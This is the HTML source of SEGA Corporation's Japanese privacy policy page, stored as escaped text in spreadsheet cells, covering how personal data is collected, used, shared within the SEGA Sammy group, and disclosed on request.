      &lt;div class="main_cover"&gt;&lt;/div&gt;_x005F_x000D_
    &lt;/main&gt;_x005F_x000D_
	_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
&lt;/header&gt;_x005F_x000D_
_x005F_x000D_
&lt;div class="open-btn1"&gt;&lt;/div&gt;_x005F_x000D_
&lt;div id="search-wrap"&gt;_x005F_x000D_
&lt;form action="/site_search/index.html" method="GET"&gt;_x005F_x000D_
&lt;input type="text" name="q" value="" autocomplete="off" placeholder="検索ワードを入れて下さい"&gt;_x005F_x000D_
&lt;input name="la[]" type="hidden" value="cojp"&gt;_x005F_x000D_
&lt;input type="submit" value=""&gt;_x005F_x000D_
&lt;/form&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
&lt;div id="language"&gt;&lt;a href="../en/privacypolicy/index.html"&gt;&lt;i class="fas fa-globe"&gt;&lt;/i&gt;&lt;br class="pc_only"&gt;&lt;span class="txt_s"&gt;EN&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;/div&gt;&lt;!-- title-key end --&gt;_x005F_x000D_
	_x005F_x000D_
_x005F_x000D_
&lt;div id="main_content"&gt;_x005F_x000D_
	_x005F_x000D_
&lt;div id="breadcrumb"&gt;_x005F_x000D_
	&lt;a href="../index.html"&gt;&lt;i class="fas fa-home txt_b"&gt;&lt;/i&gt;&lt;/a&gt;　&amp;gt;　プライバシーポリシー_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;div class="content_left"&gt;_x005F_x000D_
  &lt;div class="cover_01_l"&gt;&lt;/div&gt;_x005F_x000D_
  &lt;div class="cover_02_l animated box_fadeInLeft"&gt;&lt;/div&gt;_x005F_x000D_
  &lt;div class="content_box"&gt;_x005F_x000D_
	&lt;p class="txt_weak"&gt;プライバシーポリシー&lt;/p&gt;_x005F_x000D_
    &lt;h3&gt;PRIVACY POLICY&lt;/h3&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
	_x005F_x000D_
&lt;!-- &lt;div class="lang_celect_box"&gt;_x005F_x000D_
&lt;select onChange="location.href=value;" class="extraction"&gt;_x005F_x000D_
  &lt;option value=""&gt;Language&lt;/option&gt;_x005F_x000D_
  &lt;option value="index.html"&gt;日本語&lt;/option&gt;_x005F_x000D_
  &lt;option value="../en/privacypolicy/index.html"&gt;English&lt;/option&gt;_x005F_x000D_
&lt;/select&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt; --&gt;_x005F_x000D_
	_x005F_x000D_
&lt;div class="content_base"&gt;_x005F_x000D_
  &lt;div class="white_box"&gt;_x005F_x000D_
	&lt;div class="policy_box"&gt;_x005F_x000D_
	  _ x000D_
	&lt;p class="mb_50"&gt;株式会社セガ（以下、「当社」といいます）は、お客様、お取引先様（お取引様になる可能性のある事業者を含みます。以下同じ。）、従業者（以下総称して「お客様等」といいます）からご提供いただく個人情報の保護のため、「個人情報保護基本方針」および「当社の個人情報の取り扱いについての重要事項｣を定めています。&lt;br&gt;_x005F_x000D_
	ご提供いただいた個人情報は、この「個人情報保護基本方針」および「当社の個人情報の取り扱いについての重要事項」に基づき取り扱わせていただきますのでご確認ください。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
	&lt;h4&gt;個人情報保護基本方針&lt;/h4&gt;_x005F_x000D_
	  _x005F_x000D_
	&lt;p class="mb_30"&gt;当社は、業務を円滑に行い、より良いサービスを提供するため、お客様等の個人情報を取得し保有させていただくことがございます。当社は、個人情報取扱事業者として、当社に対するお客様等の信頼に応えるため、取得し保有するお客様等の個人情報を以下の通り取り扱うものとします。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;1.個人情報の取得&lt;/h5&gt;_x005F_x000D_
	&lt;p class="mb_30"&gt;当社は、公正かつ適法な手段により個人情報を取得します。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;2.個人情報の利用目的の公表等&lt;/h5&gt;_x005F_x000D_
	&lt;p class="mb_30"&gt;当社は、個人情報を取得する場合は、原則として予めお客様等に利用目的をお知らせします。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;3.個人情報の利用&lt;/h5&gt;_x005F_x000D_
	 &lt;p class="mb_30"&gt;当社は、お客様等にお知らせした利用目的の達成に必要な範囲内で、個人情報を利用します。また、法令の定める場合を除き、予めお客様等の同意を得ることなく、個人情報を自社以外の第三者に提供しません。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;4.個人情報の共同利用&lt;/h5&gt;_x005F_x000D_
	</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p class="mb_30"&gt;当社は、個人情報を自社以外の第三者との間で共同利用する場合は、予めお客様等にお知らせします。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;5.個人情報の安全保護&lt;/h5&gt;_x005F_x000D_
	&lt;p class="mb_30"&gt;当社は、個人情報の管理にあたり正確性及び安全性を確保するため、適切なセキュリティ対策、従業員の監督等の必要かつ適切な措置の実施に努めます。当社が講じている個人情報の安全管理措置の詳細については、&lt;a href="https://faq.sega.jp/hc/ja/requests/new?ticket_form_id=360000782373" target="_blank"&gt;こちら &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;からお問い合わせください。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;6.従業員の監督&lt;/h5&gt;_x005F_x000D_
	 &lt;p class="mb_30"&gt;当社は、個人情報の安全管理が図られるよう、当社の役員及び従業者に対する必要かつ適切な監督を行います。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;7.委託先の監督&lt;/h5&gt;_x005F_x000D_
	&lt;p class="mb_30"&gt;当社は、個人情報の取扱いを自社以外の第三者に委託する場合は、当該個人情報の安全管理が図られるよう、当該第三者に対し必要かつ適切な監督を行います。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;8.個人情報の開示等について&lt;/h5&gt;_x005F_x000D_
	 &lt;p class="mb_30"&gt;当社は、当社の保有する個人情報に関し、ご本人より利用目的の通知、開示、訂正、利用の停止、消去、自社以外の第三者への提供の停止、第三者提供記録の開示（以下、「開示等」といいます。）のご請求があった場合には、法令の定めるところに従い対応します。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;9.苦情対応窓口&lt;/h5&gt;_x005F_x000D_
	</t>
  </si>
  <si>
    <t>&lt;p class="mb_30"&gt;当社は、個人情報の取扱いに関する苦情等に誠実に対応します。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;10.個人情報保護に関する社内規程の制定等&lt;/h5&gt;_x005F_x000D_
	&lt;p class="mb_30"&gt;当社は、本方針実施のため個人情報保護に関する社内規程を定めること等により個人情報の適切な取扱いについて、当社の役員及び従業員に周知徹底して実施させ、また適時に実施状況を監査する等、必要な改善に努めてまいります。&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;11.法令の遵守&lt;/h5&gt;_x005F_x000D_
	 &lt;p class="mb_50"&gt;当社は、個人情報の保護に関する法律その他の法令を遵守し、個人情報の保護に努めてまいります。&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
    &lt;p class="right mb_50"&gt;令和4年4月1日　改定&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
	&lt;hr class="mb_30"&gt;_x005F_x000D_
	  _x005F_x000D_
	&lt;h4&gt;当社の個人情報の取り扱いについての重要事項&lt;/h4&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;1.各個人情報取扱事業者の名称&lt;/h5&gt;_x005F_x000D_
	&lt;p class="mb_30"&gt;株式会社セガ&lt;br&gt;_x005F_x000D_
		（当社の代表者及び住所については&lt;a href="../company/outline/index.html" target="_blank"&gt;こちら&lt;/a&gt;をご参照ください。）&lt;/p&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;2.個人データの利用目的&lt;/h5&gt;_x005F_x000D_
	&lt;ul class="base_li mb_30"&gt;_x005F_x000D_
	  &lt;li&gt;&amp;#9312;お客様の個人情報（取得した仮名加工情報も含みます。以下本項において同じです。）&lt;br&gt;_x005F_x000D_
		&lt;ul class="base_li"&gt;_x005F_x000D_
		  &lt;li&gt;（1）商品に関する問い合わせの対応、カタログ等の資料送付、製品の修理依頼に対する対応&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（2）当社製品の開発、改善を目的としたマーケティングやプレゼントの送付、ゲーム大会等イベントに関するお知らせ&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（3）新商品紹介のためのダイレクトメール送付、メールニュース等の配信&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;・上記以外にお客様から個人情報のご提供を受ける場合においても、あらかじめ利用目的をお客様にお伝えいたします。&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;・プレゼントやイベントに応募されたお客様の氏名は、当選者発表等のために掲示する場合がありますので、あらかじめ御了承ください。&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;・当社は、Cookie等により収集された閲覧履歴及びその分析結果を取得したときは、当社においては個人データと結び付けたうえでマーケティングの目的で利用します。&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;・16歳未満の方の個人情報については、必ず保護者の方のご確認を得たうえで、ご提供いただきますようお願いいたします。&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;・利用目的を変更する必要が生じた場合には、法令により許される場合を除き、その利用について、お客様の同意を得るものとします。&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;&amp;#9313;お取引先様の個人情報&lt;br&gt;_x005F_x000D_
		&lt;ul class="base_li"&gt;_x005F_x000D_
		  &lt;li&gt;（1）取引目的の達成&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（2）業務情報等の提供&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（3）当社施設への入退管理&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（4）各種取引の開始、維持管理等のための反社会的勢力該当性の確認&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（5）上記に関連し又は付帯する業務&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;&amp;#9314;従業者の個人情報&lt;br&gt;_x005F_x000D_
		 &lt;ul class="base_li"&gt;_x005F_x000D_
		  &lt;li&gt;（1）雇用人事管理&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（2）従業者及びその家族の福利厚生&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（3）安全・衛生、健康管理、教育&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（4）上記に関連し又は付帯する業務&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/li&gt;_x005F_x000D_
	&lt;/ul&gt;_x005F_x000D_
	  _</t>
  </si>
  <si>
    <t xml:space="preserve">x000D_
    &lt;h5 class="h5_l"&gt;3.クッキー（Cookie）の利用&lt;/h5&gt;_x005F_x000D_
	&lt;ul class="base_li mb_30"&gt;_x005F_x000D_
	  &lt;li&gt;・クッキーとは、ウェブサイトの効果的な運用のために、当社管理のウェブサーバーからお客様等のブラウザに宛て送信する文字列情報です。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;・当社は、サービス向上を目的としたウェブサイトのカスタマイズ等のために、クッキーを使用することがあります。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;・当社がクッキーによりお客様等の個人情報を取得することはありません。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;・お客様等は、ブラウザの設定によりクッキーの受け取り拒否、クッキーを受け取った際の警告表示、を設定することができます。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;・当社は、ウェブサイトの使用実態に関する情報を収集するため、Google Inc.（以下「Google社」といいます。）のサービスであるGoogleアナリティクスを使用しています。Googleアナリティクスは、お客様が訪問したページ、サイトの滞在時間、訪問経路及び何をクリックしたか等に関する情報を保存します。この情報がお客様の特定に使われることはありません。当社はGoogle社から分析結果を受領し、お客様によるウェブサイトの使用状況を確認します。この情報は、Google社がそのプライバシーポリシーに従って管理します。Google社のクッキーの使用方法に関する詳細は、Google社の以下のウェブサイトをご覧ください。&lt;br&gt;_x005F_x000D_
	  - &lt;a href="https://policies.google.com/technologies/partner-sites?hl=ja"&gt;Googleのサービスを使用するサイトやアプリから収集した情報のGoogleによる使用 &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
	   &lt;li&gt;・この機能の拒否のためにはGoogle アナリティクス オプトアウト アドオンをウェブブラウザにダウンロードしてインストールしてください。&lt;br&gt;_x005F_x000D_
	  また、Googleの広告設定で、Google ディスプレイネットワークで表示される広告をカスタマイズすることができます。&lt;/li&gt;_x005F_x000D_
	&lt;/ul&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;4.個人情報の第三者提供について&lt;/h5&gt;_x005F_x000D_
	&lt;ul class="base_li mb_30"&gt;_x005F_x000D_
	  &lt;li&gt;・当社は、以下の各号に定める場合を除き、あらかじめお客様等の同意を得ることなく、お客様等より取得した個人情報を自社以外の第三者に提供することはありません。&lt;br&gt;_x005F_x000D_
		&lt;ul class="base_li"&gt;_x005F_x000D_
		  &lt;li&gt;（1）法令に基づく場合&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（2）人の生命、身体または財産の保護のために必要がある場合であって本人の同意を得ることが困難であるとき&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（3）公衆衛生の向上または児童の健全な育成の推進のために特に必要がある場合であって、本人の同意を得ることが困難な場合&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;（4）国の機関もしくは地方公共団体またはその委託を受けた者が法令の定める事務を遂行することに対して協力する必要がある場合であって、本人の同意を得ることにより当該事務の遂行に支障を及ぼすおそれがあるとき&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/li&gt;_x005F_x000D_
	&lt;/ul&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;5.個人情報の共同利用&lt;/h5&gt;_x005F_x000D_
	</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p class="mb_10"&gt;セガサミーホールディングス株式会社、当社並びにその子会社及び関連会社（以下「セガサミーグループ」といいます）では、次の通り共同利用させていただきます。&lt;/p&gt;_x005F_x000D_
	&lt;ul class="base_li mb_30"&gt;_x005F_x000D_
	  &lt;li&gt;（1）共同利用する個人データの項目&lt;br&gt;_x005F_x000D_
	  氏名、住所、性別、生年月日、所属する会社名・団体名、役職、電話番号、電子メールのアドレス、プレイデータログ、端末識別情報、位置情報、通信履歴、その他当社の業務の適切かつ円滑な遂行のために必要な、お客様等の個人情報&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;（2）共同利用者の範囲&lt;br&gt;_x005F_x000D_
	  セガサミーホールディングス株式会社&lt;br&gt;_x005F_x000D_
	  その他のセガサミーグループ各社（詳細については&lt;a href="https://www.segasammy.co.jp/japanese/pr/corp/group/list/" target="_blank"&gt;こちら &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;からご覧いただけます。）&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;（3）利用者の利用目的&lt;br&gt;_x005F_x000D_
		 &lt;ul class="base_li"&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9312;商品・イベント・キャンペーン・アンケート等各種ご案内のため&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9313;商品及びサービス等の企画・開発に役立てるため&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9314;マーケティング活動のため&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9315;サービスを利用されるお客様の成績、イベントの概要、結果等の管理&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9316;商品及びサービス等に関する登録の受付、サービスの提供&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9317;採用応募者への連絡、採用の判定、採用応募者管理&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9318;雇用人事管理&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9319;各種取引の開始、維持管理等のための反社会的勢力該当性の確認&lt;/li&gt;_x005F_x000D_
		  &lt;li&gt;&amp;#9320;その他当社の業務の適切かつ円滑な遂行&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;（4）個人データの管理に関する責任者&lt;br&gt;_x005F_x000D_
	  セガサミーホールディングス株式会社　個人情報相談窓口&lt;br&gt;_x005F_x000D_
	  同社の代表者及び住所については&lt;a href="https://www.segasammy.co.jp/japanese/pr/corp/data/" target="_blank"&gt;こちら &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;をご参照ください。&lt;/li&gt;_x005F_x000D_
	&lt;/ul&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 class="h5_l"&gt;6.開示等の求めに応じる手続&lt;/h5&gt;_x005F_x000D_
	&lt;ul class="base_li mb_30"&gt;_x005F_x000D_
	  &lt;li&gt;・当社は、個人情報に関するお客様等からのお問い合わせに対応するための窓口を設置いたします。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;・当該窓口では、当社が管理する保有個人データのうちお客様等ご自身の個人情報について、開示・訂正・利用の停止・消去などの求めに対応させていただいております。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;・開示等の求めに際し、本人確認のために運転免許証、パスポート等の公的書類のコピーをご提供いただく場合がありますので、あらかじめご了承ください。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;・開示等の求めの対応にあたっては、郵送料等の実費および手数料を申し受けることがあります。なお、手数料については、別途お知らせします。&lt;/li&gt;_x005F_x000D_
	&lt;/ul&gt;_x005F_x000D_
	  _x005F_x000D_
    &lt;h5 id="inquiry" class="h5_l"&gt;7.開示等の求めの申出先&lt;/h5&gt;_x005F_x000D_
	&lt;ul class="base_li mb_30"&gt;_x005F_x000D_
	  &lt;li&gt;&amp;#9312;お客様&lt;br&gt;_x005F_x000D_
	  個人情報に関するお客様からのお問い合わせは、お客様がご利用になったサービス等に関連する各事業のご相談窓口にて対応させていただきます。 ご相談窓口をこちら（&lt;a href="https://sega.jp/contact/" target="_blank"&gt;https://sega.jp/contact/ &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;）でご確認のうえお問い合わせください。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;&amp;#9313;お取引先様&lt;br&gt;_x005F_x000D_
	  </t>
  </si>
  <si>
    <t>当社担当者へお問い合わせください。&lt;/li&gt;_x005F_x000D_
	  &lt;li&gt;&amp;#9314;従業者&lt;br&gt;_x005F_x000D_
	  当社所定の手続きを利用して、申請してください。&lt;/li&gt;_x005F_x000D_
	&lt;/ul&gt;_x005F_x000D_
	  _ x000D_
	&lt;p&gt;なお、お問い合わせ先が不明の場合は、&lt;a href="https://faq.sega.jp/hc/ja/requests/new?ticket_form_id=360000782373" target="_blank"&gt;こちら &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;のメールフォームでお問い合わせください。&lt;/p&gt;_x005F_x000D_
		_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
	  _x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
	  _x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
&lt;/div&gt;&lt;!-- main_content end --&gt;_x005F_x000D_
	_x005F_x000D_
&lt;div id="gototop"&gt;&lt;a href="#wrap"&gt;_x005F_x000D_
	&lt;img src="../common/images/gototop.png" width="12" height="15" alt=""/&gt;_x005F_x000D_
	&lt;p&gt;PAGE TOP&lt;/p&gt;&lt;/a&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
 &lt;footer&gt;_x005F_x000D_
  &lt;div id="footer_box"&gt;_x005F_x000D_
	&lt;div class="footer_content"&gt;_x005F_x000D_
	  &lt;div class="sitemap"&gt;_x005F_x000D_
	  &lt;ul class="sitemap_li"&gt;_x005F_x000D_
		&lt;li</t>
  </si>
  <si>
    <t>class="sitemap_title last"&gt;&lt;a href="/index.html"&gt;TOP &lt; span&gt;トップ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li class="sitemap_title"&gt;&lt;a href="/release/index.html"&gt;NEWS &lt;span&gt;お知らせ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/release/index.html"&gt;2023&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/release/index.html?year=2022"&gt;2022&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/release/index.html?year=2021"&gt;2021&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/release/index.html?year=2020"&gt;2020&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;アーカイブ&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/release/sega-group/index.html"&gt;- 株式会社セガグループ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/release/sega-games/index.html"&gt;- 株式会社セガゲームス&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li class="last"&gt;&lt;a href="/release/sega-interactive/index.html"&gt;- 株式会社セガ・インタラクティブ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;!-- &lt;li class="last"&gt;&lt;a href="https://sega-net.com/release/"&gt;- 株式会社セガネットワークス、旧セガネットワークスカンパニー&lt;/a&gt;&lt;/li&gt; --&gt;_x005F_x000D_
		&lt;li class="sitemap_title"&gt;&lt;a href="/company/index.html"&gt;COMPANY &lt;span&gt;会社情報&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/company/outline/index.html"&gt;会社概要&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/company/services/index.html"&gt;事業内容&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/company/message/index.html"&gt;トップメッセージ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/company/history/index.html"&gt;沿革&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/company/access/index.html"&gt;アクセス&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
	  &lt;/ul&gt;_x005F_x000D_
	  &lt;ul class="sitemap_li"&gt;_x005F_x000D_
		&lt;li class="sitemap_title"&gt;&lt;a href="/group/index.html"&gt;SEGA GROUP &lt;span&gt;セガグループ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/group/summary/index.html"&gt;グループ事業概要&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/group/list/index.html"&gt;グループ企業一覧&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li class="last"&gt;&lt;a href="/group/ci/index.html"&gt;コーポレートアイデンティティ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li class="sitemap_title"&gt;&lt;a href="/recruit/index.html" target="_blank"&gt;RECRUIT &lt;span&gt;採用情報&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;株式会社セガ&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/recruit/fresh/index.html" target="_blank"&gt;- 新卒採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/recruit/career/index.html" target="_blank"&gt;- 中途採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/recruit/parttime/index.html" target="_blank"&gt;- アルバイト採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/recruit/disabled/index.html" target="_blank"&gt;- 障がい者採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="/recruit/fresh/internship/index.html" target="_blank"&gt;- インターンシップ情報&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;セガグループ&lt;/li&gt;_x005F_x000D_
		&lt;li class="last"&gt;&lt;a href="https://recruit.sega.jp/" target="_blank"&gt;- 新卒採用 &lt;i class="fas</t>
  </si>
  <si>
    <t>fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li class="sitemap_title"&gt;&lt;a href="/ir/index.html"&gt;IR &lt;span&gt;投資家情報&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt; li&gt;&lt;a href="https://www.segasammy.co.jp/japanese/ir/library/" target="_blank"&gt;投資家情報 &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt; li&gt;&lt;a href="/ir/koukoku.html"&gt;電子公告&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
	  &lt;/ul&gt;_x005F_x000D_
	  &lt;ul class="sitemap_li"&gt;_x005F_x000D_
		&lt;li class="sitemap_title"&gt;&lt;a</t>
  </si>
  <si>
    <t>href="/contact/index.html"&gt;CONTACT &lt;span&gt;お問い合わせ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;個人のお客様&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="https://www.sega.jp/contact/soft/" target="_blank"&gt;- 家庭用ゲーム・PCゲーム &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt; li&gt;&lt;a href="https://www.sega.jp/contact/kt/" target="_blank"&gt;- スマートフォンコンテンツ &lt;i class="fas</t>
  </si>
  <si>
    <t>fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt; li&gt;&lt;a href="https://www.sega.jp/contact/arcade/" target="_blank"&gt;- アーケードゲーム &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;</t>
  </si>
  <si>
    <t>li&gt;&lt;a href="https://www.sega.jp/contact/prize/" target="_blank"&gt;- セガプライズ・セガ ラッキーくじ &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt; li&gt;&lt;a href="https://www.sega.jp/contact/" target="_blank"&gt;- その他のお問い合わせ &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;法人のお客様&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="https://www.sega.jp/business/" target="_blank"&gt;- 法人のお客様 &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
	  &lt;/ul&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	  &lt;div class="link"&gt;_x005F_x000D_
		&lt;ul&gt;_x005F_x000D_
		  &lt;li&gt;&lt;a href="https://sega.jp/" target="_blank"&gt;&lt;img src="/common/images/link_productsite.jpg" width="345" height="110" alt=""/&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
		&lt;div class="policy_link"&gt;▶ &lt;a href="/streaming_guideline/index.html"&gt;ゲームプレイ映像利用に関するガイドライン&lt;/a&gt;&lt;br&gt;_x005F_x000D_
		▶ &lt;a href="/sitepolicy/index.html"&gt;サイトポリシー&lt;/a&gt;&lt;br&gt;_x005F_x000D_
		▶ &lt;a href="/privacypolicy/index.html"&gt;プライバシーポリシー&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	  _</t>
  </si>
  <si>
    <t>x000D_
	&lt;div class="logo-copy"&gt;_x005F_x000D_
	  &lt;ul&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="https://www.sega.co.jp/" target="_blank"&gt;&lt;img src="/common/images/logo-sega_w.svg" alt=""/&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;li&gt;&lt;a href="https://www.segasammy.co.jp/" target="_blank"&gt;&lt;img src="/common/images/segasammy_logo.svg" alt=""/&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
	  &lt;/ul&gt;_x005F_x000D_
	  &lt;p&gt;&amp;copy;SEGA&lt;/p&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
 &lt;/footer&gt;_x005F_x000D_
_x005F_x000D_
